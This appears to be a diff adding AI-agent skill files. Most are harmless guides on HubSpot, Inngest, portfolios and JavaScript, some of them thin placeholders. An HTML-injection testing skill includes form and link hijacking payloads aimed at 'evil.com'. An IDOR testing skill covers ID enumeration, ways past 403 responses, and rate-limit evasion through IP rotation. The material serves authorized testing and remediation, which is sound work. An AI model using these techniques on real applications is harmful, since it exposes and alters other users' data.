print(f"[?] Partial reflection: {payload}")
except Exception as e:
print(f"[-] Error: {e}")
```
### Phase 10: Prevention and Remediation
Secure coding practices:
```php
// PHP: Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');
// PHP: Strip tags
echo strip_tags($user_input);
// PHP: Allow specific tags only
echo strip_tags($user_input, '<p><b><i>');
```
```python
# Python: HTML escape
from html import escape
safe_output = escape(user_input)
# Python Flask: Auto-escaping
{{ user_input }} # Jinja2 escapes by default
{{ user_input | safe }} # Marks as safe (dangerous!)
```
```javascript
// JavaScript: Text content (safe)
element.textContent = userInput;
// JavaScript: innerHTML (dangerous!)
element.innerHTML = userInput; // Vulnerable!
// JavaScript: Sanitize
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;
```
Server-side protections:
- Input validation (whitelist allowed characters)
- Output encoding (context-aware escaping)
- Content Security Policy (CSP) headers
- Web Application Firewall (WAF) rules
## Quick Reference
### Common Test Payloads
| Payload | Purpose |
|---------|---------|
| `<h1>Test</h1>` | Basic rendering test |
| `<b>Bold</b>` | Simple formatting |
| `<a href="evil.com">Link</a>` | Link injection |
| `<img src=x>` | Image tag test |
| `<div style="color:red">` | Style injection |
| `<form action="evil.com">` | Form hijacking |
### Injection Contexts
| Context | Test Approach |
|---------|---------------|
| URL parameter | `?param=<h1>test</h1>` |
| Form field | POST with HTML payload |
| Cookie value | Inject via document.cookie |
| HTTP header | Inject in Referer/User-Agent |
| File upload | HTML file with malicious content |
### Encoding Types
| Type | Example |
|------|---------|
| URL encoding | `%3Ch1%3E` = `<h1>` |
| HTML entities | `&#60;h1&#62;` = `<h1>` |
| Double encoding | `%253C` = `<` |
| Unicode | `\u003c` = `<` |
## Constraints and Limitations
### Attack Limitations
- Modern browsers may sanitize some injections
- CSP can prevent inline styles and scripts
- WAFs may block common payloads
- Some applications escape output properly
### Testing Considerations
- Distinguish between HTML injection and XSS
- Verify visual impact in browser
- Test in multiple browsers
- Check for stored vs reflected
### Severity Assessment
- Lower severity than XSS (no script execution)
- Higher impact when combined with phishing
- Consider defacement/reputation damage
- Evaluate credential theft potential
## Troubleshooting
| Issue | Solutions |
|-------|-----------|
| HTML not rendering | Check if output HTML-encoded; try encoding variations; verify HTML context |
| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags |
| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects |

42
skills/hubspot-integration/SKILL.md Normal file
View File

@@ -0,0 +1,42 @@
---
name: hubspot-integration
description: "Expert patterns for HubSpot CRM integration including OAuth authentication, CRM objects, associations, batch operations, webhooks, and custom objects. Covers Node.js and Python SDKs. Use when: hubspot, hubspot api, hubspot crm, hubspot integration, contacts api."
source: vibeship-spawner-skills (Apache 2.0)
---
# HubSpot Integration
## Patterns
### OAuth 2.0 Authentication
Secure authentication for public apps
### Private App Token
Authentication for single-account integrations
### CRM Object CRUD Operations
Create, read, update, delete CRM records
## Anti-Patterns
### ❌ Using Deprecated API Keys
### ❌ Individual Requests Instead of Batch
### ❌ Polling Instead of Webhooks
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |

439
skills/idor-testing/SKILL.md Normal file
View File

@@ -0,0 +1,439 @@
---
name: IDOR Vulnerability Testing
description: This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.
---
# IDOR Vulnerability Testing
## Purpose
Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access.
## Inputs / Prerequisites
- **Target Web Application**: URL of application with user-specific resources
- **Multiple User Accounts**: At least two test accounts to verify cross-user access
- **Burp Suite or Proxy Tool**: Intercepting proxy for request manipulation
- **Authorization**: Written permission for security testing
- **Understanding of Application Flow**: Knowledge of how objects are referenced (IDs, filenames)
## Outputs / Deliverables
- **IDOR Vulnerability Report**: Documentation of discovered access control bypasses
- **Proof of Concept**: Evidence of unauthorized data access across user contexts
- **Affected Endpoints**: List of vulnerable API endpoints and parameters
- **Impact Assessment**: Classification of data exposure severity
- **Remediation Recommendations**: Specific fixes for identified vulnerabilities
## Core Workflow
### 1. Understand IDOR Vulnerability Types
#### Direct Reference to Database Objects
Occurs when applications reference database records via user-controllable parameters:
```
# Original URL (authenticated as User A)
example.com/user/profile?id=2023
# Manipulation attempt (accessing User B's data)
example.com/user/profile?id=2022
```
#### Direct Reference to Static Files
Occurs when applications expose file paths or names that can be enumerated:
```
# Original URL (User A's receipt)
example.com/static/receipt/205.pdf
# Manipulation attempt (User B's receipt)
example.com/static/receipt/200.pdf
```
### 2. Reconnaissance and Setup
#### Create Multiple Test Accounts
```
Account 1: "attacker" - Primary testing account
Account 2: "victim" - Account whose data we attempt to access
```
#### Identify Object References
Capture and analyze requests containing:
- Numeric IDs in URLs: `/api/user/123`
- Numeric IDs in parameters: `?id=123&action=view`
- Numeric IDs in request body: `{"userId": 123}`
- File paths: `/download/receipt_123.pdf`
- GUIDs/UUIDs: `/profile/a1b2c3d4-e5f6-...`
#### Map User IDs
```
# Access user ID endpoint (if available)
GET /api/user-id/
# Note ID patterns:
# - Sequential integers (1, 2, 3...)
# - Auto-incremented values
# - Predictable patterns
```
### 3. Detection Techniques
#### URL Parameter Manipulation
```
# Step 1: Capture original authenticated request
GET /api/user/profile?id=1001 HTTP/1.1
Cookie: session=attacker_session
# Step 2: Modify ID to target another user
GET /api/user/profile?id=1000 HTTP/1.1
Cookie: session=attacker_session
# Vulnerable if: Returns victim's data with attacker's session
```
#### Request Body Manipulation
```
# Original POST request
POST /api/address/update HTTP/1.1
Content-Type: application/json
Cookie: session=attacker_session
{"id": 5, "userId": 1001, "address": "123 Attacker St"}
# Modified request targeting victim
{"id": 5, "userId": 1000, "address": "123 Attacker St"}
```
#### HTTP Method Switching
```
# Original GET request may be protected
GET /api/admin/users/1000 → 403 Forbidden
# Try alternative methods
POST /api/admin/users/1000 → 200 OK (Vulnerable!)
PUT /api/admin/users/1000 → 200 OK (Vulnerable!)
```
### 4. Exploitation with Burp Suite
#### Manual Exploitation
```
1. Configure browser proxy through Burp Suite
2. Login as "attacker" user
3. Navigate to profile/data page
4. Enable Intercept in Proxy tab
5. Capture request with user ID
6. Modify ID to victim's ID
7. Forward request
8. Observe response for victim's data
```
#### Automated Enumeration with Intruder
```
1. Send request to Intruder (Ctrl+I)
2. Clear all payload positions
3. Select ID parameter as payload position
4. Configure attack type: Sniper
5. Payload settings:
- Type: Numbers
- Range: 1 to 10000
- Step: 1
6. Start attack
7. Analyze responses for 200 status codes
```
#### Battering Ram Attack for Multiple Positions
```
# When same ID appears in multiple locations
PUT /api/addresses/§5§/update HTTP/1.1
{"id": §5§, "userId": 3}
Attack Type: Battering Ram
Payload: Numbers 1-1000
```
### 5. Common IDOR Locations
#### API Endpoints
```
/api/user/{id}
/api/profile/{id}
/api/order/{id}
/api/invoice/{id}
/api/document/{id}
/api/message/{id}
/api/address/{id}/update
/api/address/{id}/delete
```
#### File Downloads
```
/download/invoice_{id}.pdf
/static/receipts/{id}.pdf
/uploads/documents/{filename}
/files/reports/report_{date}_{id}.xlsx
```
#### Query Parameters
```
?userId=123
?orderId=456
?documentId=789
?file=report_123.pdf
?account=user@email.com
```
## Quick Reference
### IDOR Testing Checklist
| Test | Method | Indicator of Vulnerability |
|------|--------|---------------------------|
| Increment/Decrement ID | Change `id=5` to `id=4` | Returns different user's data |
| Use Victim's ID | Replace with known victim ID | Access granted to victim's resources |
| Enumerate Range | Test IDs 1-1000 | Find valid records of other users |
| Negative Values | Test `id=-1` or `id=0` | Unexpected data or errors |
| Large Values | Test `id=99999999` | System information disclosure |
| String IDs | Change format `id=user_123` | Logic bypass |
| GUID Manipulation | Modify UUID portions | Predictable UUID patterns |
### Response Analysis
| Status Code | Interpretation |
|-------------|----------------|
| 200 OK | Potential IDOR - verify data ownership |
| 403 Forbidden | Access control working |
| 404 Not Found | Resource doesn't exist |
| 401 Unauthorized | Authentication required |
| 500 Error | Potential input validation issue |
### Common Vulnerable Parameters
| Parameter Type | Examples |
|----------------|----------|
| User identifiers | `userId`, `uid`, `user_id`, `account` |
| Resource identifiers | `id`, `pid`, `docId`, `fileId` |
| Order/Transaction | `orderId`, `transactionId`, `invoiceId` |
| Message/Communication | `messageId`, `threadId`, `chatId` |
| File references | `filename`, `file`, `document`, `path` |
## Constraints and Limitations
### Operational Boundaries
- Requires at least two valid user accounts for verification
- Some applications use session-bound tokens instead of IDs
- GUID/UUID references harder to enumerate but not impossible
- Rate limiting may restrict enumeration attempts
- Some IDOR requires chained vulnerabilities to exploit
### Detection Challenges
- Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin)
- Blind IDOR where response doesn't confirm access
- Time-based IDOR in asynchronous operations
- IDOR in websocket communications
### Legal Requirements
- Only test applications with explicit authorization
- Document all testing activities and findings
- Do not access, modify, or exfiltrate real user data
- Report findings through proper disclosure channels
## Examples
### Example 1: Basic ID Parameter IDOR
```
# Login as attacker (userId=1001)
# Navigate to profile page
# Original request
GET /api/profile?id=1001 HTTP/1.1
Cookie: session=abc123
# Response: Attacker's profile data
# Modified request (targeting victim userId=1000)
GET /api/profile?id=1000 HTTP/1.1
Cookie: session=abc123
# Vulnerable Response: Victim's profile data returned!
```
### Example 2: IDOR in Address Update Endpoint
```
# Intercept address update request
PUT /api/addresses/5/update HTTP/1.1
Content-Type: application/json
Cookie: session=attacker_session
{
"id": 5,
"userId": 1001,
"street": "123 Main St",
"city": "Test City"
}
# Modify userId to victim's ID
{
"id": 5,
"userId": 1000, # Changed from 1001
"street": "Hacked Address",
"city": "Exploit City"
}
# If 200 OK: Address created under victim's account
```
### Example 3: Static File IDOR
```
# Download own receipt
GET /api/download/5 HTTP/1.1
Cookie: session=attacker_session
# Response: PDF of attacker's receipt (order #5)
# Attempt to access other receipts
GET /api/download/3 HTTP/1.1
Cookie: session=attacker_session
# Vulnerable Response: PDF of victim's receipt (order #3)!
```
### Example 4: Burp Intruder Enumeration
```
# Configure Intruder attack
Target: PUT /api/addresses/§1§/update
Payload Position: Address ID in URL and body
Attack Configuration:
- Type: Battering Ram
- Payload: Numbers 0-20, Step 1
Body Template:
{
"id": §1§,
"userId": 3
}
# Analyze results:
# - 200 responses indicate successful modification
# - Check victim's account for new addresses
```
### Example 5: Horizontal to Vertical Escalation
```
# Step 1: Enumerate user roles
GET /api/user/1 → {"role": "user", "id": 1}
GET /api/user/2 → {"role": "user", "id": 2}
GET /api/user/3 → {"role": "admin", "id": 3}
# Step 2: Access admin functions with discovered ID
GET /api/admin/dashboard?userId=3 HTTP/1.1
Cookie: session=regular_user_session
# If accessible: Vertical privilege escalation achieved
```
## Troubleshooting
### Issue: All Requests Return 403 Forbidden
**Cause**: Server-side access control is implemented
**Solution**:
```
# Try alternative attack vectors:
1. HTTP method switching (GET → POST → PUT)
2. Add X-Original-URL or X-Rewrite-URL headers
3. Try parameter pollution: ?id=1001&id=1000
4. URL encoding variations: %31%30%30%30 for "1000"
5. Case variations for string IDs
```
### Issue: Application Uses UUIDs Instead of Sequential IDs
**Cause**: Randomized identifiers reduce enumeration risk
**Solution**:
```
# UUID discovery techniques:
1. Check response bodies for leaked UUIDs
2. Search JavaScript files for hardcoded UUIDs
3. Check API responses that list multiple objects
4. Look for UUID patterns in error messages
5. Try UUID v1 (time-based) prediction if applicable
```
### Issue: Session Token Bound to User
**Cause**: Application validates session against requested resource
**Solution**:
```
# Advanced bypass attempts:
1. Test for IDOR in unauthenticated endpoints
2. Check password reset/email verification flows
3. Look for IDOR in file upload/download
4. Test API versioning: /api/v1/ vs /api/v2/
5. Check mobile API endpoints (often less protected)
```
### Issue: Rate Limiting Blocks Enumeration
**Cause**: Application implements request throttling
**Solution**:
```
# Bypass techniques:
1. Add delays between requests (Burp Intruder throttle)
2. Rotate IP addresses (proxy chains)
3. Target specific high-value IDs instead of full range
4. Use different endpoints for same resources
5. Test during off-peak hours
```
### Issue: Cannot Verify IDOR Impact
**Cause**: Response doesn't clearly indicate data ownership
**Solution**:
```
# Verification methods:
1. Create unique identifiable data in victim account
2. Look for PII markers (name, email) in responses
3. Compare response lengths between users
4. Check for timing differences in responses
5. Use secondary indicators (creation dates, metadata)
```
## Remediation Guidance
### Implement Proper Access Control
```python
# Django example - validate ownership
def update_address(request, address_id):
address = Address.objects.get(id=address_id)
# Verify ownership before allowing update
if address.user != request.user:
return HttpResponseForbidden("Unauthorized")
# Proceed with update
address.update(request.data)
```
### Use Indirect References
```python
# Instead of: /api/address/123
# Use: /api/address/current-user/billing
def get_address(request):
# Always filter by authenticated user
address = Address.objects.filter(user=request.user).first()
return address
```
### Server-Side Validation
```python
# Always validate on server, never trust client input
def download_receipt(request, receipt_id):
receipt = Receipt.objects.filter(
id=receipt_id,
user=request.user # Critical: filter by current user
).first()
if not receipt:
return HttpResponseNotFound()
return FileResponse(receipt.file)
```

55
skills/inngest/SKILL.md Normal file
View File

@@ -0,0 +1,55 @@
---
name: inngest
description: "Inngest expert for serverless-first background jobs, event-driven workflows, and durable execution without managing queues or workers. Use when: inngest, serverless background job, event-driven workflow, step function, durable execution."
source: vibeship-spawner-skills (Apache 2.0)
---
# Inngest Integration
You are an Inngest expert who builds reliable background processing without
managing infrastructure. You understand that serverless doesn't mean you can't
have durable, long-running workflows - it means you don't manage the workers.
You've built AI pipelines that take minutes, onboarding flows that span days,
and event-driven systems that process millions of events. You know that the
magic of Inngest is in its steps - each one a checkpoint that survives failures.
Your core philosophy:
1. Event
## Capabilities
- inngest-functions
- event-driven-workflows
- step-functions
- serverless-background-jobs
- durable-sleep
- fan-out-patterns
- concurrency-control
- scheduled-functions
## Patterns
### Basic Function Setup
Inngest function with typed events in Next.js
### Multi-Step Workflow
Complex workflow with parallel steps and error handling
### Scheduled/Cron Functions
Functions that run on a schedule
## Anti-Patterns
### ❌ Not Using Steps
### ❌ Huge Event Payloads
### ❌ Ignoring Concurrency
## Related Skills
Works well with: `nextjs-app-router`, `vercel-deployment`, `supabase-backend`, `email-systems`, `ai-agents-architect`, `stripe-integration`

223
skills/interactive-portfolio/SKILL.md Normal file
View File

@@ -0,0 +1,223 @@
---
name: interactive-portfolio
description: "Expert in building portfolios that actually land jobs and clients - not just showing work, but creating memorable experiences. Covers developer portfolios, designer portfolios, creative portfolios, and portfolios that convert visitors into opportunities. Use when: portfolio, personal website, showcase work, developer portfolio, designer portfolio."
source: vibeship-spawner-skills (Apache 2.0)
---
# Interactive Portfolio
**Role**: Portfolio Experience Designer
You know a portfolio isn't a resume - it's a first impression that needs
to convert. You balance creativity with usability. You understand that
hiring managers spend 30 seconds on each portfolio. You make those 30
seconds count. You help people stand out without being gimmicky.
## Capabilities
- Portfolio architecture
- Project showcase design
- Interactive case studies
- Personal branding for devs/designers
- Contact conversion
- Portfolio performance
- Work presentation
- Testimonial integration
## Patterns
### Portfolio Architecture
Structure that works for portfolios
**When to use**: When planning portfolio structure
```javascript
## Portfolio Architecture
### The 30-Second Test
In 30 seconds, visitors should know:
1. Who you are
2. What you do
3. Your best work
4. How to contact you
### Essential Sections
| Section | Purpose | Priority |
|---------|---------|----------|
| Hero | Hook + identity | Critical |
| Work/Projects | Prove skills | Critical |
| About | Personality + story | Important |
| Contact | Convert interest | Critical |
| Testimonials | Social proof | Nice to have |
| Blog/Writing | Thought leadership | Optional |
### Navigation Patterns
```
Option 1: Single page scroll
- Best for: Designers, creatives
- Works well with animations
- Mobile friendly
Option 2: Multi-page
- Best for: Lots of projects
- Individual case study pages
- Better for SEO
Option 3: Hybrid
- Main sections on one page
- Detailed case studies separate
- Best of both worlds
```
### Hero Section Formula
```
[Your name]
[What you do in one line]
[One line that differentiates you]
[CTA: View Work / Contact]
```
```
### Project Showcase
How to present work effectively
**When to use**: When building project sections
```javascript
## Project Showcase
### Project Card Elements
| Element | Purpose |
|---------|---------|
| Thumbnail | Visual hook |
| Title | What it is |
| One-liner | What you did |
| Tech/tags | Quick scan |
| Results | Proof of impact |
### Case Study Structure
```
1. Hero image/video
2. Project overview (2-3 sentences)
3. The challenge
4. Your role
5. Process highlights
6. Key decisions
7. Results/impact
8. Learnings (optional)
9. Links (live, GitHub, etc.)
```
### Showing Impact
| Instead of | Write |
|------------|-------|
| "Built a website" | "Increased conversions 40%" |
| "Designed UI" | "Reduced user drop-off 25%" |
| "Developed features" | "Shipped to 50K users" |
### Visual Presentation
- Device mockups for web/mobile
- Before/after comparisons
- Process artifacts (wireframes, etc.)
- Video walkthroughs for complex work
- Hover effects for engagement
```
### Developer Portfolio Specifics
What works for dev portfolios
**When to use**: When building developer portfolio
```javascript
## Developer Portfolio
### What Hiring Managers Look For
1. Code quality (GitHub link)
2. Real projects (not just tutorials)
3. Problem-solving ability
4. Communication skills
5. Technical depth
### Must-Haves
- GitHub profile link (cleaned up)
- Live project links
- Tech stack for each project
- Your specific contribution (for team projects)
### Project Selection
| Include | Avoid |
|---------|-------|
| Real problems solved | Tutorial clones |
| Side projects with users | Incomplete projects |
| Open source contributions | "Coming soon" |
| Technical challenges | Basic CRUD apps |
### Technical Showcase
```javascript
// Show code snippets that demonstrate:
- Clean architecture decisions
- Performance optimizations
- Clever solutions
- Testing approach
```
### Blog/Writing
- Technical deep dives
- Problem-solving stories
- Learning journeys
- Shows communication skills
```
## Anti-Patterns
### ❌ Template Portfolio
**Why bad**: Looks like everyone else.
No memorable impression.
Doesn't show creativity.
Easy to forget.
**Instead**: Add personal touches.
Custom design elements.
Unique project presentations.
Your voice in the copy.
### ❌ All Style No Substance
**Why bad**: Fancy animations, weak projects.
Style over substance.
Hiring managers see through it.
No proof of skills.
**Instead**: Projects first, style second.
Real work with real impact.
Quality over quantity.
Depth over breadth.
### ❌ Resume Website
**Why bad**: Boring, forgettable.
Doesn't use the medium.
No personality.
Lists instead of stories.
**Instead**: Show, don't tell.
Visual case studies.
Interactive elements.
Personality throughout.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Portfolio more complex than your actual work | medium | ## Right-Sizing Your Portfolio |
| Portfolio looks great on desktop, broken on mobile | high | ## Mobile-First Portfolio |
| Visitors don't know what to do next | medium | ## Portfolio CTAs |
| Portfolio shows old or irrelevant work | medium | ## Portfolio Freshness |
## Related Skills
Works well with: `scroll-experience`, `3d-web-experience`, `landing-page-design`, `personal-branding`

645
skills/javascript-mastery/SKILL.md Normal file
View File

@@ -0,0 +1,645 @@
---
name: javascript-mastery
description: "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. From fundamentals like primitives and closures to advanced patterns like async/await and functional programming. Use when explaining JS concepts, debugging JavaScript issues, or teaching JavaScript fundamentals."
---
# 🧠 JavaScript Mastery
> 33+ essential JavaScript concepts every developer should know, inspired by [33-js-concepts](https://github.com/leonardomso/33-js-concepts).
## When to Use This Skill
Use this skill when:
- Explaining JavaScript concepts
- Debugging tricky JS behavior
- Teaching JavaScript fundamentals
- Reviewing code for JS best practices
- Understanding language quirks
---
## 1. Fundamentals
### 1.1 Primitive Types
JavaScript has 7 primitive types:
```javascript
// String
const str = "hello";
// Number (integers and floats)
const num = 42;
const float = 3.14;
// BigInt (for large integers)
const big = 9007199254740991n;
// Boolean
const bool = true;
// Undefined
let undef; // undefined
// Null
const empty = null;
// Symbol (unique identifiers)
const sym = Symbol("description");
```
**Key points**:
- Primitives are immutable
- Passed by value
- `typeof null === "object"` is a historical bug
### 1.2 Type Coercion
JavaScript implicitly converts types:
```javascript
// String coercion
"5" + 3; // "53" (number → string)
"5" - 3; // 2 (string → number)
// Boolean coercion
Boolean(""); // false
Boolean("hello"); // true
Boolean(0); // false
Boolean([]); // true (!)
// Equality coercion
"5" == 5; // true (coerces)
"5" === 5; // false (strict)
```
**Falsy values** (8 total):
`false`, `0`, `-0`, `0n`, `""`, `null`, `undefined`, `NaN`
### 1.3 Equality Operators
```javascript
// == (loose equality) - coerces types
null == undefined; // true
"1" == 1; // true
// === (strict equality) - no coercion
null === undefined; // false
"1" === 1; // false
// Object.is() - handles edge cases
Object.is(NaN, NaN); // true (NaN === NaN is false!)
Object.is(-0, 0); // false (0 === -0 is true!)
```
**Rule**: Always use `===` unless you have a specific reason not to.
---
## 2. Scope & Closures
### 2.1 Scope Types
```javascript
// Global scope
var globalVar = "global";
function outer() {
// Function scope
var functionVar = "function";
if (true) {
// Block scope (let/const only)
let blockVar = "block";
const alsoBlock = "block";
var notBlock = "function"; // var ignores blocks!
}
}
```
### 2.2 Closures
A closure is a function that remembers its lexical scope:
```javascript
function createCounter() {
let count = 0; // "closed over" variable
return {
increment() {
return ++count;
},
decrement() {
return --count;
},
getCount() {
return count;
},
};
}
const counter = createCounter();
counter.increment(); // 1
counter.increment(); // 2
counter.getCount(); // 2
```
**Common use cases**:
- Data privacy (module pattern)
- Function factories
- Partial application
- Memoization
### 2.3 var vs let vs const
```javascript
// var - function scoped, hoisted, can redeclare
var x = 1;
var x = 2; // OK
// let - block scoped, hoisted (TDZ), no redeclare
let y = 1;
// let y = 2; // Error!
// const - like let, but can't reassign
const z = 1;
// z = 2; // Error!
// BUT: const objects are mutable
const obj = { a: 1 };
obj.a = 2; // OK
obj.b = 3; // OK
```
---
## 3. Functions & Execution
### 3.1 Call Stack
```javascript
function first() {
console.log("first start");
second();
console.log("first end");
}
function second() {
console.log("second");
}
first();
// Output:
// "first start"
// "second"
// "first end"
```
Stack overflow example:
```javascript
function infinite() {
infinite(); // No base case!
}
infinite(); // RangeError: Maximum call stack size exceeded
```
### 3.2 Hoisting
```javascript
// Variable hoisting
console.log(a); // undefined (hoisted, not initialized)
var a = 5;
console.log(b); // ReferenceError (TDZ)
let b = 5;
// Function hoisting
sayHi(); // Works!
function sayHi() {
console.log("Hi!");
}
// Function expressions don't hoist
sayBye(); // TypeError
var sayBye = function () {
console.log("Bye!");
};
```
### 3.3 this Keyword
```javascript
// Global context
console.log(this); // window (browser) or global (Node)
// Object method
const obj = {
name: "Alice",
greet() {
console.log(this.name); // "Alice"
},
};
// Arrow functions (lexical this)
const obj2 = {
name: "Bob",
greet: () => {
console.log(this.name); // undefined (inherits outer this)
},
};
// Explicit binding
function greet() {
console.log(this.name);
}
greet.call({ name: "Charlie" }); // "Charlie"
greet.apply({ name: "Diana" }); // "Diana"
const bound = greet.bind({ name: "Eve" });
bound(); // "Eve"
```
---
## 4. Event Loop & Async
### 4.1 Event Loop
```javascript
console.log("1");
setTimeout(() => console.log("2"), 0);
Promise.resolve().then(() => console.log("3"));
console.log("4");
// Output: 1, 4, 3, 2
// Why? Microtasks (Promises) run before macrotasks (setTimeout)
```
**Execution order**:
1. Synchronous code (call stack)
2. Microtasks (Promise callbacks, queueMicrotask)
3. Macrotasks (setTimeout, setInterval, I/O)
### 4.2 Callbacks
```javascript
// Callback pattern
function fetchData(callback) {
setTimeout(() => {
callback(null, { data: "result" });
}, 1000);
}
// Error-first convention
fetchData((error, result) => {
if (error) {
console.error(error);
return;
}
console.log(result);
});
// Callback hell (avoid this!)
getData((data) => {
processData(data, (processed) => {
saveData(processed, (saved) => {
notify(saved, () => {
// 😱 Pyramid of doom
});
});
});
});
```
### 4.3 Promises
```javascript
// Creating a Promise
const promise = new Promise((resolve, reject) => {
setTimeout(() => {
resolve("Success!");
// or: reject(new Error("Failed!"));
}, 1000);
});
// Consuming Promises
promise
.then((result) => console.log(result))
.catch((error) => console.error(error))
.finally(() => console.log("Done"));
// Promise combinators
Promise.all([p1, p2, p3]); // All must succeed
Promise.allSettled([p1, p2]); // Wait for all, get status
Promise.race([p1, p2]); // First to settle
Promise.any([p1, p2]); // First to succeed
```
### 4.4 async/await
```javascript
async function fetchUserData(userId) {
try {
const response = await fetch(`/api/users/${userId}`);
if (!response.ok) throw new Error("Failed to fetch");
const user = await response.json();
return user;
} catch (error) {
console.error("Error:", error);
throw error; // Re-throw for caller to handle
}
}
// Parallel execution
async function fetchAll() {
const [users, posts] = await Promise.all([
fetch("/api/users"),
fetch("/api/posts"),
]);
return { users, posts };
}
```
---
## 5. Functional Programming
### 5.1 Higher-Order Functions
Functions that take or return functions:
```javascript
// Takes a function
const numbers = [1, 2, 3];
const doubled = numbers.map((n) => n * 2); // [2, 4, 6]
// Returns a function
function multiply(a) {
return function (b) {
return a * b;
};
}
const double = multiply(2);
double(5); // 10
```
### 5.2 Pure Functions
```javascript
// Pure: same input → same output, no side effects
function add(a, b) {
return a + b;
}
// Impure: modifies external state
let total = 0;
function addToTotal(value) {
total += value; // Side effect!
return total;
}
// Impure: depends on external state
function getDiscount(price) {
return price * globalDiscountRate; // External dependency
}
```
### 5.3 map, filter, reduce
```javascript
const users = [
{ name: "Alice", age: 25 },
{ name: "Bob", age: 30 },
{ name: "Charlie", age: 35 },
];
// map: transform each element
const names = users.map((u) => u.name);
// ["Alice", "Bob", "Charlie"]
// filter: keep elements matching condition
const adults = users.filter((u) => u.age >= 30);
// [{ name: "Bob", ... }, { name: "Charlie", ... }]
// reduce: accumulate into single value
const totalAge = users.reduce((sum, u) => sum + u.age, 0);
// 90
// Chaining
const result = users
.filter((u) => u.age >= 30)
.map((u) => u.name)
.join(", ");
// "Bob, Charlie"
```
### 5.4 Currying & Composition
```javascript
// Currying: transform f(a, b, c) into f(a)(b)(c)
const curry = (fn) => {
return function curried(...args) {
if (args.length >= fn.length) {
return fn.apply(this, args);
}
return (...moreArgs) => curried(...args, ...moreArgs);
};
};
const add = curry((a, b, c) => a + b + c);
add(1)(2)(3); // 6
add(1, 2)(3); // 6
add(1)(2, 3); // 6
// Composition: combine functions
const compose =
(...fns) =>
(x) =>
fns.reduceRight((acc, fn) => fn(acc), x);
const pipe =
(...fns) =>
(x) =>
fns.reduce((acc, fn) => fn(acc), x);
const addOne = (x) => x + 1;
const double = (x) => x * 2;
const addThenDouble = compose(double, addOne);
addThenDouble(5); // 12 = (5 + 1) * 2
const doubleThenAdd = pipe(double, addOne);
doubleThenAdd(5); // 11 = (5 * 2) + 1
```
---
## 6. Objects & Prototypes
### 6.1 Prototypal Inheritance
```javascript
// Prototype chain
const animal = {
speak() {
console.log("Some sound");
},
};
const dog = Object.create(animal);
dog.bark = function () {
console.log("Woof!");
};
dog.speak(); // "Some sound" (inherited)
dog.bark(); // "Woof!" (own method)
// ES6 Classes (syntactic sugar)
class Animal {
speak() {
console.log("Some sound");
}
}
class Dog extends Animal {
bark() {
console.log("Woof!");
}
}
```
### 6.2 Object Methods
```javascript
const obj = { a: 1, b: 2 };
// Keys, values, entries
Object.keys(obj); // ["a", "b"]
Object.values(obj); // [1, 2]
Object.entries(obj); // [["a", 1], ["b", 2]]
// Shallow copy
const copy = { ...obj };
const copy2 = Object.assign({}, obj);
// Freeze (immutable)
const frozen = Object.freeze({ x: 1 });
frozen.x = 2; // Silently fails (or throws in strict mode)
// Seal (no add/delete, can modify)
const sealed = Object.seal({ x: 1 });
sealed.x = 2; // OK
sealed.y = 3; // Fails
delete sealed.x; // Fails
```
---
## 7. Modern JavaScript (ES6+)
### 7.1 Destructuring
```javascript
// Array destructuring
const [first, second, ...rest] = [1, 2, 3, 4, 5];
// first = 1, second = 2, rest = [3, 4, 5]
// Object destructuring
const { name, age, city = "Unknown" } = { name: "Alice", age: 25 };
// name = "Alice", age = 25, city = "Unknown"
// Renaming
const { name: userName } = { name: "Bob" };
// userName = "Bob"
// Nested
const {
address: { street },
} = { address: { street: "123 Main" } };
```
### 7.2 Spread & Rest
```javascript
// Spread: expand iterable
const arr1 = [1, 2, 3];
const arr2 = [...arr1, 4, 5]; // [1, 2, 3, 4, 5]
const obj1 = { a: 1 };
const obj2 = { ...obj1, b: 2 }; // { a: 1, b: 2 }
// Rest: collect remaining
function sum(...numbers) {
return numbers.reduce((a, b) => a + b, 0);
}
sum(1, 2, 3, 4); // 10
```
### 7.3 Modules
```javascript
// Named exports
export const PI = 3.14159;
export function square(x) {
return x * x;
}
// Default export
export default class Calculator {}
// Importing
import Calculator, { PI, square } from "./math.js";
import * as math from "./math.js";
// Dynamic import
const module = await import("./dynamic.js");
```
### 7.4 Optional Chaining & Nullish Coalescing
```javascript
// Optional chaining (?.)
const user = { address: { city: "NYC" } };
const city = user?.address?.city; // "NYC"
const zip = user?.address?.zip; // undefined (no error)
const fn = user?.getName?.(); // undefined if no method
// Nullish coalescing (??)
const value = null ?? "default"; // "default"
const zero = 0 ?? "default"; // 0 (not nullish!)
const empty = "" ?? "default"; // "" (not nullish!)
// Compare with ||
const value2 = 0 || "default"; // "default" (0 is falsy)
```
---
## Quick Reference Card
| Concept | Key Point |
| :------------- | :-------------------------------- |
| `==` vs `===` | Always use `===` |
| `var` vs `let` | Prefer `let`/`const` |
| Closures | Function + lexical scope |
| `this` | Depends on how function is called |
| Event loop | Microtasks before macrotasks |
| Pure functions | Same input → same output |
| Prototypes | `__proto__` → prototype chain |
| `??` vs `\|\|` | `??` only checks null/undefined |
---
## Resources
- [33 JS Concepts](https://github.com/leonardomso/33-js-concepts)
- [JavaScript.info](https://javascript.info/)
- [MDN JavaScript Guide](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide)
- [You Don't Know JS](https://github.com/getify/You-Dont-Know-JS)

238
skills/langfuse/SKILL.md Normal file
View File

@@ -0,0 +1,238 @@
---
name: langfuse
